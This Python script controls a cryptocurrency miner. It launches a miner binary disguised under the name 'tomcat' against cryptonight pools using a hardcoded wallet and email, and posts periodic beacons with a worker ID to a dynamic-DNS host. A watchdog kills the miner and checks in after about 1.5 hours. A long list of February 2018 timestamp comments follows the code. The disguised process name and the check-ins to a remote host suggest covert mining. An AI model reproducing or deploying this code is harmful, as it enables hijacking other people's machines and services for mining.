import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:36:04.250737
#2018-02-17 17:24:04.936120
#2018-02-17 19:13:01.389419
#2018-02-17 21:01:05.363572
#2018-02-17 22:46:01.378349
#2018-02-18 00:29:07.004924
#2018-02-18 02:20:01.623153
#2018-02-18 04:07:03.766854
#2018-02-18 05:57:07.284900
#2018-02-18 07:48:06.269934
#2018-02-18 09:36:06.158119
#2018-02-18 11:22:06.325747
#2018-02-18 13:08:06.599736
#2018-02-18 14:55:07.650428
#2018-02-18 16:42:06.281150
#2018-02-18 18:32:04.092923
#2018-02-18 20:20:07.273398
#2018-02-18 22:06:02.195354
#2018-02-18 23:53:06.148511
#2018-02-19 01:39:06.210972
#2018-02-19 03:27:02.020043
#2018-02-19 05:12:07.510767
#2018-02-19 06:58:01.326325
#2018-02-19 08:46:03.804636
#2018-02-19 10:37:05.966108
#2018-02-19 12:24:09.219650
#2018-02-19 14:12:09.417496
#2018-02-19 16:02:08.802285
#2018-02-19 17:51:01.351501
#2018-02-19 19:39:04.115885
#2018-02-19 21:26:04.283658
#2018-02-19 23:11:06.390585
#2018-02-20 00:56:07.523036
#2018-02-20 02:46:01.331190
#2018-02-20 04:33:06.713439
#2018-02-20 06:17:05.046908
#2018-02-20 08:02:06.043425
#2018-02-20 09:49:06.814419
#2018-02-20 11:33:08.945480
#2018-02-20 13:19:05.683699
#2018-02-20 15:05:09.315833
#2018-02-20 16:51:01.238914
#2018-02-20 18:37:02.178738
#2018-02-20 20:27:06.113452
#2018-02-20 22:14:02.036273
#2018-02-20 23:55:03.055517
#2018-02-21 01:40:02.189804
#2018-02-21 03:28:04.458153
#2018-02-21 05:16:07.054482
#2018-02-21 07:03:06.829728
#2018-02-21 08:48:05.965290
#2018-02-21 10:36:06.056367
#2018-02-21 12:24:06.367839
#2018-02-21 14:11:01.746363
#2018-02-21 15:58:09.595791
#2018-02-21 17:50:02.814403
#2018-02-21 19:37:04.243073
#2018-02-21 21:24:04.130548
#2018-02-21 23:10:03.067404
#2018-02-22 00:57:07.950533
#2018-02-22 02:47:07.501393
#2018-02-22 04:35:08.757236
#2018-02-22 06:20:07.401436
#2018-02-22 08:07:06.604886
#2018-02-22 09:54:08.342446
#2018-02-22 11:39:04.865553
#2018-02-22 13:26:06.055522
#2018-02-22 15:15:10.493971
#2018-02-22 17:01:07.929004
#2018-02-22 18:48:07.072231
#2018-02-22 20:39:07.583411
#2018-02-22 22:26:06.636714
#2018-02-23 00:12:07.429281
#2018-02-23 02:02:05.423520
#2018-02-23 03:51:04.689879
#2018-02-23 05:43:01.482723
#2018-02-23 07:28:06.532415
#2018-02-23 09:32:06.443584
#2018-02-23 11:38:01.868579
#2018-02-23 13:27:04.876589
#2018-02-23 15:14:07.667614
#2018-02-23 17:02:12.037891
#2018-02-23 18:51:06.921679
#2018-02-23 20:36:08.118570
#2018-02-23 22:24:06.654281
#2018-02-24 00:10:11.065936
#2018-02-24 02:03:07.462004
#2018-02-24 03:53:04.477637
#2018-02-24 05:40:08.822224
#2018-02-24 07:28:04.197196
#2018-02-24 09:16:02.008032
#2018-02-24 11:11:06.062426
#2018-02-24 13:00:01.404023
#2018-02-24 14:47:05.551179
#2018-02-24 16:39:06.977246
#2018-02-24 18:27:06.881369
#2018-02-24 20:13:06.386016
#2018-02-24 22:01:01.519984
#2018-02-25 00:59:05.771750
#2018-02-25 04:41:05.637290
#2018-02-25 08:35:02.590105